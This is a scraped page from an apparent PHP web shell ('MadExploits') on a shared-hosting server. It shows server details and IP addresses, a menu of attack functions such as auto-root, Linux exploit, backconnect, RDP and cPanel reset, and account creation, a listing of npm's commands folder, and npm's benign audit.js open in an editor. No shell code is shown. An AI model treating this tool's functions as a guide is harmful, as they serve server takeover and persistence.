Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.144.3.43
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
lib /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
access.js
5.45
KB
-rw-r--r--
adduser.js
2.2
KB
-rw-r--r--
audit.js
11.95
KB
-rw-r--r--
bin.js
729
B
-rw-r--r--
birthday.js
508
B
-rw-r--r--
bugs.js
815
B
-rw-r--r--
cache.js
7.08
KB
-rw-r--r--
ci.js
3.63
KB
-rw-r--r--
completion.js
8.91
KB
-rw-r--r--
config.js
8.11
KB
-rw-r--r--
dedupe.js
1.37
KB
-rw-r--r--
deprecate.js
2.06
KB
-rw-r--r--
diff.js
8.1
KB
-rw-r--r--
dist-tag.js
5.47
KB
-rw-r--r--
docs.js
447
B
-rw-r--r--
doctor.js
9.22
KB
-rw-r--r--
edit.js
2
KB
-rw-r--r--
exec.js
2.44
KB
-rw-r--r--
explain.js
3.55
KB
-rw-r--r--
explore.js
2.33
KB
-rw-r--r--
find-dupes.js
602
B
-rw-r--r--
fund.js
6.37
KB
-rw-r--r--
get.js
524
B
-rw-r--r--
help-search.js
5.62
KB
-rw-r--r--
help.js
4.53
KB
-rw-r--r--
hook.js
3.93
KB
-rw-r--r--
init.js
6.81
KB
-rw-r--r--
install-ci-test.js
377
B
-rw-r--r--
install-test.js
374
B
-rw-r--r--
install.js
5.11
KB
-rw-r--r--
link.js
5.02
KB
-rw-r--r--
ll.js
234
B
-rw-r--r--
logout.js
1.34
KB
-rw-r--r--
ls.js
16.94
KB
-rw-r--r--
org.js
4.2
KB
-rw-r--r--
outdated.js
8.84
KB
-rw-r--r--
owner.js
5.88
KB
-rw-r--r--
pack.js
2.36
KB
-rw-r--r--
ping.js
874
B
-rw-r--r--
pkg.js
3.47
KB
-rw-r--r--
prefix.js
343
B
-rw-r--r--
profile.js
11.25
KB
-rw-r--r--
prune.js
779
B
-rw-r--r--
publish.js
6.33
KB
-rw-r--r--
query.js
2.81
KB
-rw-r--r--
rebuild.js
2.16
KB
-rw-r--r--
repo.js
1.24
KB
-rw-r--r--
restart.js
351
B
-rw-r--r--
root.js
298
B
-rw-r--r--
run-script.js
6.9
KB
-rw-r--r--
search.js
2.72
KB
-rw-r--r--
set-script.js
2.63
KB
-rw-r--r--
set.js
572
B
-rw-r--r--
shrinkwrap.js
2.64
KB
-rw-r--r--
star.js
1.87
KB
-rw-r--r--
stars.js
1.03
KB
-rw-r--r--
start.js
341
B
-rw-r--r--
stop.js
336
B
-rw-r--r--
team.js
4.44
KB
-rw-r--r--
test.js
336
B
-rw-r--r--
token.js
6.79
KB
-rw-r--r--
uninstall.js
1.52
KB
-rw-r--r--
unpublish.js
4.51
KB
-rw-r--r--
unstar.js
182
B
-rw-r--r--
update.js
1.7
KB
-rw-r--r--
version.js
3.6
KB
-rw-r--r--
view.js
14.38
KB
-rw-r--r--
whoami.js
514
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : audit.js
const Arborist = require('@npmcli/arborist') const auditReport = require('npm-audit-report') const fetch = require('npm-registry-fetch') const localeCompare = require('@isaacs/string-locale-compare')('en') const npa = require('npm-package-arg') const pacote = require('pacote') const pMap = require('p-map') const ArboristWorkspaceCmd = require('../arborist-cmd.js') const auditError = require('../utils/audit-error.js') const log = require('../utils/log-shim.js') const reifyFinish = require('../utils/reify-finish.js') const sortAlphabetically = (a, b) => localeCompare(a.name, b.name) class VerifySignatures { constructor (tree, filterSet, npm, opts) { this.tree = tree this.filterSet = filterSet this.npm = npm this.opts = opts this.keys = new Map() this.invalid = [] this.missing = [] this.checkedPackages = new Set() this.auditedWithKeysCount = 0 this.verifiedCount = 0 this.output = [] this.exitCode = 0 } async run () { const start = process.hrtime.bigint() // Find all deps in tree const { edges, registries } = this.getEdgesOut(this.tree.inventory.values(), this.filterSet) if (edges.size === 0) { throw new Error('found no installed dependencies to audit') } await Promise.all([...registries].map(registry => this.setKeys({ registry }))) const progress = log.newItem('verifying registry signatures', edges.size) const mapper = async (edge) => { progress.completeWork(1) await this.getVerifiedInfo(edge) } await pMap(edges, mapper, { concurrency: 20, stopOnError: true }) // Didn't find any dependencies that could be verified, e.g. only local // deps, missing version, not on a registry etc. if (!this.auditedWithKeysCount) { throw new Error('found no dependencies to audit that where installed from ' + 'a supported registry') } const invalid = this.invalid.sort(sortAlphabetically) const missing = this.missing.sort(sortAlphabetically) const hasNoInvalidOrMissing = invalid.length === 0 && missing.length === 0 if (!hasNoInvalidOrMissing) { this.exitCode = 1 } if (this.npm.config.get('json')) { this.appendOutput(JSON.stringify({ invalid: this.makeJSON(invalid), missing: this.makeJSON(missing), }, null, 2)) return } const end = process.hrtime.bigint() const elapsed = end - start const auditedPlural = this.auditedWithKeysCount > 1 ? 's' : '' const timing = `audited ${this.auditedWithKeysCount} package${auditedPlural} in ` + `${Math.floor(Number(elapsed) / 1e9)}s` this.appendOutput(`${timing}\n`) if (this.verifiedCount) { const verifiedBold = this.npm.chalk.bold('verified') const msg = this.verifiedCount === 1 ? `${this.verifiedCount} package has a ${verifiedBold} registry signature\n` : `${this.verifiedCount} packages have ${verifiedBold} registry signatures\n` this.appendOutput(msg) } if (missing.length) { const missingClr = this.npm.chalk.bold(this.npm.chalk.red('missing')) const msg = missing.length === 1 ? `package has a ${missingClr} registry signature` : `packages have ${missingClr} registry signatures` this.appendOutput( `${missing.length} ${msg} but the registry is ` + `providing signing keys:\n` ) this.appendOutput(this.humanOutput(missing)) } if (invalid.length) { const invalidClr = this.npm.chalk.bold(this.npm.chalk.red('invalid')) const msg = invalid.length === 1 ? `${invalid.length} package has an ${invalidClr} registry signature:\n` : `${invalid.length} packages have ${invalidClr} registry signatures:\n` this.appendOutput( `${missing.length ? '\n' : ''}${msg}` ) this.appendOutput(this.humanOutput(invalid)) const tamperMsg = invalid.length === 1 ? `\nSomeone might have tampered with this package since it was ` + `published on the registry!\n` : `\nSomeone might have tampered with these packages since they where ` + `published on the registry!\n` this.appendOutput(tamperMsg) } } appendOutput (...args) { this.output.push(...args.flat()) } report () { return { report: this.output.join('\n'), exitCode: this.exitCode } } getEdgesOut (nodes, filterSet) { const edges = new Set() const registries = new Set() for (const node of nodes) { for (const edge of node.edgesOut.values()) { const filteredOut = edge.from && filterSet && filterSet.size > 0 && !filterSet.has(edge.from.target) if (!filteredOut) { const spec = this.getEdgeSpec(edge) if (spec) { // Prefetch and cache public keys from used registries registries.add(this.getSpecRegistry(spec)) } edges.add(edge) } } } return { edges, registries } } async setKeys ({ registry }) { const keys = await fetch.json('/-/npm/v1/keys', { ...this.npm.flatOptions, registry, }).then(({ keys }) => keys.map((key) => ({ ...key, pemkey: `-----BEGIN PUBLIC KEY-----\n${key.key}\n-----END PUBLIC KEY-----`, }))).catch(err => { if (err.code === 'E404') { return null } else { throw err } }) if (keys) { this.keys.set(registry, keys) } } getEdgeType (edge) { return edge.optional ? 'optionalDependencies' : edge.peer ? 'peerDependencies' : edge.dev ? 'devDependencies' : 'dependencies' } getEdgeSpec (edge) { let name = edge.name try { name = npa(edge.spec).subSpec.name } catch { // leave it as edge.name } try { return npa(`${name}@${edge.spec}`) } catch { // Skip packages with invalid spec } } buildRegistryConfig (registry) { const keys = this.keys.get(registry) || [] const parsedRegistry = new URL(registry) const regKey = `//${parsedRegistry.host}${parsedRegistry.pathname}` return { [`${regKey}:_keys`]: keys, } } getSpecRegistry (spec) { return fetch.pickRegistry(spec, this.npm.flatOptions) } getValidPackageInfo (edge) { const type = this.getEdgeType(edge) // Skip potentially optional packages that are not on disk, as these could // be omitted during install if (edge.error === 'MISSING' && type !== 'dependencies') { return } const spec = this.getEdgeSpec(edge) // Skip invalid version requirements if (!spec) { return } const node = edge.to || edge const { version } = node.package || {} if (node.isWorkspace || // Skip local workspaces packages !version || // Skip packages that don't have a installed version, e.g. optonal dependencies !spec.registry) { // Skip if not from registry, e.g. git package return } for (const omitType of this.npm.config.get('omit')) { if (node[omitType]) { return } } return { name: spec.name, version, type, location: node.location, registry: this.getSpecRegistry(spec), } } async verifySignatures (name, version, registry) { const { _integrity: integrity, _signatures, _resolved: resolved, } = await pacote.manifest(`${name}@${version}`, { verifySignatures: true, ...this.buildRegistryConfig(registry), ...this.npm.flatOptions, }) const signatures = _signatures || [] return { integrity, signatures, resolved, } } async getVerifiedInfo (edge) { const info = this.getValidPackageInfo(edge) if (!info) { return } const { name, version, location, registry, type } = info if (this.checkedPackages.has(location)) { // we already did or are doing this one return } this.checkedPackages.add(location) // We only "audit" or verify the signature, or the presence of it, on // packages whose registry returns signing keys const keys = this.keys.get(registry) || [] if (keys.length) { this.auditedWithKeysCount += 1 } try { const { integrity, signatures, resolved } = await this.verifySignatures( name, version, registry ) // Currently we only care about missing signatures on registries that provide a public key // We could make this configurable in the future with a strict/paranoid mode if (signatures.length) { this.verifiedCount += 1 } else if (keys.length) { this.missing.push({ name, version, location, resolved, integrity, registry, }) } } catch (e) { if (e.code === 'EINTEGRITYSIGNATURE') { const { signature, keyid, integrity, resolved } = e this.invalid.push({ name, type, version, resolved, location, integrity, registry, signature, keyid, }) } else { throw e } } } humanOutput (list) { return list.map(v => `${this.npm.chalk.red(`${v.name}@${v.version}`)} (${v.registry})` ).join('\n') } makeJSON (deps) { return deps.map(d => ({ name: d.name, version: d.version, location: d.location, resolved: d.resolved, integrity: d.integrity, signature: d.signature, keyid: d.keyid, })) } } class Audit extends ArboristWorkspaceCmd { static description = 'Run a security audit' static name = 'audit' static params = [ 'audit-level', 'dry-run', 'force', 'json', 'package-lock-only', 'omit', 'foreground-scripts', 'ignore-scripts', ...super.params, ] static usage = ['[fix|signatures]'] async completion (opts) { const argv = opts.conf.argv.remain if (argv.length === 2) { return ['fix'] } switch (argv[2]) { case 'fix': return [] default: throw Object.assign(new Error(argv[2] + ' not recognized'), { code: 'EUSAGE', }) } } async exec (args) { if (args[0] === 'signatures') { await this.auditSignatures() } else { await this.auditAdvisories(args) } } async auditAdvisories (args) { const reporter = this.npm.config.get('json') ? 'json' : 'detail' const opts = { ...this.npm.flatOptions, audit: true, path: this.npm.prefix, reporter, workspaces: this.workspaceNames, } const arb = new Arborist(opts) const fix = args[0] === 'fix' await arb.audit({ fix }) if (fix) { await reifyFinish(this.npm, arb) } else { // will throw if there's an error, because this is an audit command auditError(this.npm, arb.auditReport) const result = auditReport(arb.auditReport, opts) process.exitCode = process.exitCode || result.exitCode this.npm.output(result.report) } } async auditSignatures () { if (this.npm.global) { throw Object.assign( new Error('`npm audit signatures` does not support global packages'), { code: 'EAUDITGLOBAL', } ) } log.verbose('loading installed dependencies') const opts = { ...this.npm.flatOptions, path: this.npm.prefix, workspaces: this.workspaceNames, } const arb = new Arborist(opts) const tree = await arb.loadActual() let filterSet = new Set() if (opts.workspaces && opts.workspaces.length) { filterSet = arb.workspaceDependencySet( tree, opts.workspaces, this.npm.flatOptions.includeWorkspaceRoot ) } else if (!this.npm.flatOptions.workspacesEnabled) { filterSet = arb.excludeWorkspacesDependencySet(tree) } const verify = new VerifySignatures(tree, filterSet, this.npm, { ...opts }) await verify.run() const result = verify.report() process.exitCode = process.exitCode || result.exitCode this.npm.output(result.report) } } module.exports = Audit
Close